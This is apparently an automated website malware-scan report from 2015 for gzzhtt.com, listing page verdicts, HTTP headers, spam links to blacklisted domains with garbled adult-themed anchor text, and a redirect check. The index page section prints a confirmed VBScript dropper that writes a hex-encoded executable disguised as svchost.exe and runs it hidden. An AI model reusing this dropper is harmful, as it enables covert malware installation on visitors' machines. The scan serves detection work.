Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gzzhtt.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gzzhtt.com/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 05:20:16 GMT Accept-Ranges: bytes ETag: "dcd176dda323d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 137132 Content-Location: http://gzzhtt.com/index.html Content-Type: text/html Last-Modified: Mon, 29 Dec 2014 20:13:09 GMT | clean |
http://gzzhtt.com/index.html | 200 OK Content-Length: 137132 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://gzzhtt.com/aboutus/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 05:20:22 GMT Accept-Ranges: bytes ETag: "b8e95c3ec030d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142237 Content-Location: http://gzzhtt.com/aboutus/index.html Content-Type: text/html Last-Modified: Thu, 15 Jan 2015 12:39:03 GMT | clean |
http://gzzhtt.com/aboutus/index.html | 200 OK Content-Length: 142237 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: jftouzi.com ...[1251 bytes skipped]... /> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://nxtxjs.com/companys/">µðºÙ¹ý³ÌÎÄÕÂ</a></li> <li><a href="http://cnkyhg.com/jpspw/">¿ìÀÖ´ó±¾ÓªÊÞÊÞͼƬ</a></li> <li><a href="http://jftouzi.com/customer/">ww.400.ai</a></li> <li><a href="http://xzjctx.com/list/">Ô·Çíµ¤ÑݹýµÄ»ÆÉ«µçÓ°</a></li> <li><a href="http://ideast.cn/hotlm/">É«Çé1238080</a></li> <li><a href="http://cfqczs.com/contare/">ßäßäÇéÉ«Íø×îй«¸æ</a></li> <li><a href="http://nwpcc.com.cn/newslist/">gaonimei.us</a></li> <li><a href="http://cywhch.com/hotlm/">±©Å°¼éÒù& ...[3197 bytes skipped]... | ||
http://baidu.nvdei.com/js/a.js | 200 OK Content-Length: 745 Content-Type: application/x-javascript | clean |
http://gzzhtt.com/about/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 05:20:27 GMT Accept-Ranges: bytes ETag: "7ab4dafeff2fd01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142353 Content-Location: http://gzzhtt.com/about/index.html Content-Type: text/html Last-Modified: Wed, 14 Jan 2015 13:42:53 GMT | clean |
http://gzzhtt.com/about/index.html | 200 OK Content-Length: 142353 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: flhfans.net ...[1147 bytes skipped]... /contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://jxxlgd.com/merssdc/">³ÔʲôÄÜȥ̵</a></li> <li><a href="http://flhfans.net/jobs/">ÂèÂèºÍ¶ù×ÓµÄÂÒÂ××ö°®Ð¡</a></li> <li><a href="http://dnmsgs.com/calvv/">ºÝºÝÉäÓ°Ôº ÑÇÖÞÇéÉ«</a></li> <li><a href="http://mu-art.com/gxgm/">7wyt.com4nxx.4nxx</a></li> <li><a href="http://ml0351.com/guccii/">ÓÐû°Ù¶ÈëƬÍøÕ¾</a></li> <li><a href="http://nxtxjs.com/ktvbg/">ÎåÔÂÉ«Ìì³ÉÈËɫͼ</a></li> <li><a href="http://cghcby.com/service ...[3304 bytes skipped]... | ||
http://gzzhtt.com/html/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 05:20:31 GMT Accept-Ranges: bytes ETag: "e0da1dd22431d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 141607 Content-Location: http://gzzhtt.com/html/index.html Content-Type: text/html Last-Modified: Fri, 16 Jan 2015 00:39:00 GMT | clean |
http://gzzhtt.com/html/index.html | 200 OK Content-Length: 141607 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: jftouzi.com ...[1059 bytes skipped]... ">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://jftouzi.com/hotlm/">97xxoo qvod</a></li> <li><a href="http://sgsdgm.com/html/">www.585.tttco...</a></li> <li><a href="http://lngaoke.com.cn/customer/">ÓëÉ«ÓûÓйصĵçÓ°</a></li> <li><a href="http://gssyyc.com/lieres/">Çó×îÐÂÉ«ÇéÍøÖ· ÎÞ¶¾µÄ</a></li> <li><a href="http://jnlyr.com/viishow/">ÉÏÈÄÊо³ÄÚµÄǦɽÏØÊǽÎ÷î´×å¾ÓÃñÊ×ÒªµÄ¼¯¾ÓµØ£¬ÈË¿Ú¶àÈË£¬î´ÃñÄܸè 1 1 0 1 1 2012-9-14 2:1 ...[3324 bytes skipped]... | ||
http://gzzhtt.com/chanpin/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 05:20:38 GMT Accept-Ranges: bytes ETag: "66fd3dc14832d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 143159 Content-Location: http://gzzhtt.com/chanpin/index.html Content-Type: text/html Last-Modified: Sat, 17 Jan 2015 11:28:45 GMT X-Died: timeout at scan.pm line 1566. | clean |
http://gzzhtt.com/chanpin/index.html | 200 OK Content-Length: 143159 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: xulimin.com ...[1355 bytes skipped]... /> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://cjpad.com/items/">ÐÇÐǵãµÆ°é×àÏÂÔØ</a></li> <li><a href="http://hairycrabchina.com/gxgm/">Å®¶ùµÄ</a></li> <li><a href="http://nlpxxw.com/jobs/">jo2 112 2µç»ú²ÎÊý</a></li> <li><a href="http://xulimin.com/develop/">ÎÞ¶¾åÐÒ£ÉçÇø</a></li> <li><a href="http://lycdfy.com/sportlca/">«×«e¥² icp 030173</a></li> <li><a href="http://dio-ad.com/huasuo/">²»Öª»ðÎèÊÜŰͼ</a></li> <li><a href="http://ywscwx.com/list/">ÈöÄò²¢¼¯ÌåÅÄÕÕ</a></li> <li><a href="http://lotav.cn/lean/">iwgb-051</a></li> <li><a href="http://tlbxcc.com/contact/">²Ô¾®¿ÕÄIJ¿Ã»ÂíÈü¿ ...[3075 bytes skipped]... | ||
http://gzzhtt.com/news_cn/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 05:20:41 GMT Accept-Ranges: bytes ETag: "1c4e59a46033d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142988 Content-Location: http://gzzhtt.com/news_cn/index.html Content-Type: text/html Last-Modified: Sun, 18 Jan 2015 20:52:16 GMT | clean |
http://gzzhtt.com/news_cn/index.html | 200 OK Content-Length: 142988 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: shylmm.com ...[1115 bytes skipped]... /">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://shylmm.com/project/">ÈËÊÞqvodÉ«</a></li> <li><a href="http://facesmap.net/newslist/">²»×öÌæÉíÇéÈË103</a></li> <li><a href="http://junanshan.com/cardin/">ÓÐÉùС˵ٶùµÄÄÌË®Ãâ·ÑÊÔÌý</a></li> <li><a href="http://wolongke.com/comcontent/">523a×ÛºÏÉ«</a></li> <li><a href="http://xzxsx.cn/ktvbg/">19ËêÅ®ÉúÖ³Æ÷¹Ùʵͼ</a></li> <li><a href="http://ideast.cn/burb ...[3313 bytes skipped]... | ||
http://gzzhtt.com/contact/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 05:20:44 GMT Accept-Ranges: bytes ETag: "c47a8c93e34d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142238 Content-Location: http://gzzhtt.com/contact/index.html Content-Type: text/html Last-Modified: Mon, 19 Jan 2015 23:17:04 GMT | clean |
http://gzzhtt.com/contact/index.html | 200 OK Content-Length: 142238 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: bjjrfz.com ...[1080 bytes skipped]... /">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://bjjrfz.com/aspcms/">ÑÇÖÞÎÞÂë»ÆɫƬ</a></li> <li><a href="http://apace.cc/contare/">www97se38</a></li> <li><a href="http://jdzdfs.com/news/">°×»¢Ñ¨ ×ÔÅÄ</a></li> <li><a href="http://dageee.com/givenchy/">ÕÒÒÔÈÕ±¾Â×ÀíƬÀÏʦǿ¼é×Ô¼ºÑ§Éú</a></li> <li><a href="http://hanbiyuan.com/ansiu/">ww.222.com</a></li> <li><a href="http://lsylctt.com/items/">ºÝºÜéÖ ...[3342 bytes skipped]... | ||
http://gzzhtt.com/guest/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 05:20:49 GMT Accept-Ranges: bytes ETag: "645afb21e35d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142711 Content-Location: http://gzzhtt.com/guest/index.html Content-Type: text/html Last-Modified: Wed, 21 Jan 2015 02:00:20 GMT | clean |
http://gzzhtt.com/guest/index.html | 200 OK Content-Length: 142711 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: gzyhsw.com ...[1182 bytes skipped]... contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://qfsmw.com/givenchy/">ÊÕË÷Èý¼¶Æ¬µçÓ°</a></li> <li><a href="http://gzyhsw.com/bmbbmw/">ËØÈË¿ì²¥×ö°®</a></li> <li><a href="http://yalishe.cn/chiujy/">ÄÐÈË´©Å®Ð¬</a></li> <li><a href="http://gdzone.net/givenchy/">www.16788.cn</a></li> <li><a href="http://hzyhwj.com/guccii/">ÍõÅÆ´ó¼úµý20101115</a></li> <li><a href="http://rcc1688.cn/fenrui/">ÒùɧÀÏʦɫͼ</a></li> <li><a href="http://xgmtjf.com/egou/">gav.com</a> ...[3268 bytes skipped]... | ||
http://gzzhtt.com/guest/0.html | 200 OK Content-Length: 17227 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: jnkbdg.com ...[1302 bytes skipped]... iv> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://whsre.com.cn/gswh/">qintin</a></li> <li><a href="http://hjzszx.com/huasuo/">µç×ÓÊéÑÔÇéС˵</a></li> <li><a href="http://jnkbdg.com/service/">»ÆÉ«ÂÒÂ×С°ËØÔ</a></li> <li><a href="http://xulimin.com/news/">pepxxÓ°Ôº</a></li> <li><a href="http://htahj.com/chanel/">qvodË¿ÍàÃÀÅ®×Ôο</a></li> <li><a href="http://zqtea.cn/ansiu/">www,zse8.xom</a></li> <li><a href="http://hzuvzn.com/tdeth/">¿ì²¥µçÓ°Ò»¼¶Æ¬Ãâ·ÑÏÂÔØ</a></li> <li><a href="http://hjtx.cn/bmbbmw/">ÄÐÈËÓÃʲô×Ôο×î ...[2885 bytes skipped]... | ||
http://gzzhtt.com/guest/1.html | 200 OK Content-Length: 17151 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: shylmm.com ...[1108 bytes skipped]... ">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a></div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://shylmm.com/vuiton/">2012Äê×îвÝÁñÉçÇø</a></li> <li><a href="http://lgsztm.com/contact/">51mmm.cow</a></li> <li><a href="http://sxzto.cn/guest/">ŮŮsmµõ´ò</a></li> <li><a href="http://sckxtj.com/aboutus/">08 22 hao pg</a></li> <li><a href="http://hanbiyuan.com/aboutus/">³ÉÈËÓ°Ôºa¼¶Æ¬µçÓ°</a></li> <li><a href="http://cywhch.com/gswh/">www.gaokao100. ...[3113 bytes skipped]... | ||
http://gzzhtt.com/guest/2.html | 200 OK Content-Length: 16550 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: efiglio.com ...[1234 bytes skipped]... ct/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a></div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://zgyytw.com/productslist/">×ã²Ê5790Ó°ÊÓ</a></li> <li><a href="http://efiglio.com/calvv/">Å·ÃÀɫͼ¼ÒÍ¥ÂÒÂ× ¶¼Êм¤Çé</a></li> <li><a href="http://dnmsgs.com/companys/">¹ÙÍøbtÏÂÔØqqìÅÎè</a></li> <li><a href="http://zqpec.com/hugoi/">ÈýÁùÁãÍøzhan</a></li> <li><a href="http://uiguo.com/donnaka/">½ðÏ£³º ×ö¸öºÃ°Ö°Ö</a></li> <li><a href="http://bjztba.com/yves/">www.789eee.com</a></li> <li><a href="http://htahj.com/donnaka/"> ...[3165 bytes skipped]... | ||
http://gzzhtt.com/guest/3.html | 200 OK Content-Length: 17265 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: flhfans.net ...[1114 bytes skipped]... >²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a></div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://flhfans.net/products/">É«¸çÔÚÏßµçÓ°ÏÂÔØ</a></li> <li><a href="http://sycass.com/htcui/">1gµÈÓÚ¶àÉÙkb</a></li> <li><a href="http://khkids.com/news/">Ñ©ºü×ÀÃæÈÕÀú</a></li> <li><a href="http://dlbljc.com/build/">6666Ò¹µçÓ°</a></li> <li><a href="http://sh-bxgg.com/products/">¶¯ÎïÊÀ½ç¿ÅäÂíÊÓƵ</a></li> <li><a href="http://cxzxjp.com/fotuyt/">×ö°®Í¼Æ¬ºÝº ...[3047 bytes skipped]... | ||
http://gzzhtt.com/hugoi/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 05:20:56 GMT Accept-Ranges: bytes ETag: "b88eafd59733d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 141714 Content-Location: http://gzzhtt.com/hugoi/index.html Content-Type: text/html Last-Modified: Mon, 19 Jan 2015 03:27:21 GMT | clean |
http://gzzhtt.com/hugoi/index.html | 200 OK Content-Length: 141714 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: qycjiu.com ...[1055 bytes skipped]... /">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://qycjiu.com/messages/">ÆæÆæÉ«åúA.COM</a></li> <li><a href="http://hzyhwj.com/news/">ÓéÀÖ¶¼ÊÐ ÐÂÒ»</a></li> <li><a href="http://hrktwx.com/guest/">www.se868.com</a></li> <li><a href="http://sjxy668.cn/saint/">¿ì²¥ÊÓƵÊÞÊÞÃÅ</a></li> <li><a href="http://jxxlgd.com/burberry/">ÕæÈËhgame</a></li> <li><a href="http://shiyuru.com/tedelon/">Ë®µºÔçÃç´´×÷</ ...[3383 bytes skipped]... | ||
http://gzzhtt.com/hugoi/0.html | 200 OK Content-Length: 16465 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: lycdfy.com ...[1405 bytes skipped]... br/> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://sgsdgm.com/saint/">www48wyt.com</a></li> <li><a href="http://ideast.cn/merssdc/">×ß½øÒ¹µê ¿ì²¥</a></li> <li><a href="http://dzrhwy.com/fenrui/">ÑÇÖÞ×ÔÅÄ͵ÅÄ¿ì²¥</a></li> <li><a href="http://lycdfy.com/product/">vagaaÏÂÔØ.2006</a></li> <li><a href="http://groupsms.cc/donnaka/">bl¸ßhÎÄlºÏ¼¯</a></li> <li><a href="http://jhcrafts.cn/gxgm/">wwww.kk44.com</a></li> <li><a href="http://xmttj.cn/factory/">www.uds.bjxdwz.com</a></li> <li><a href="http://gypssp.com/trades/">3¼¶»ÆƬQVOD</a></li> <li><a href="http://rusmans.com/lieres/">²·Ëã×Ó ÑÏÈï ...[2979 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gzzhtt.com
Result:
HTTP/1.1 200 OK
Date: Sat, 31 Jan 2015 05:20:16 GMT
Accept-Ranges: bytes
ETag: "dcd176dda323d01:3c49"
Server: Microsoft-IIS/6.0
Content-Length: 137132
Content-Location: http://gzzhtt.com/index.html
Content-Type: text/html
Last-Modified: Mon, 29 Dec 2014 20:13:09 GMT
...137132 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gzzhtt.com
Referer: http://www.google.com/search?q=gzzhtt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.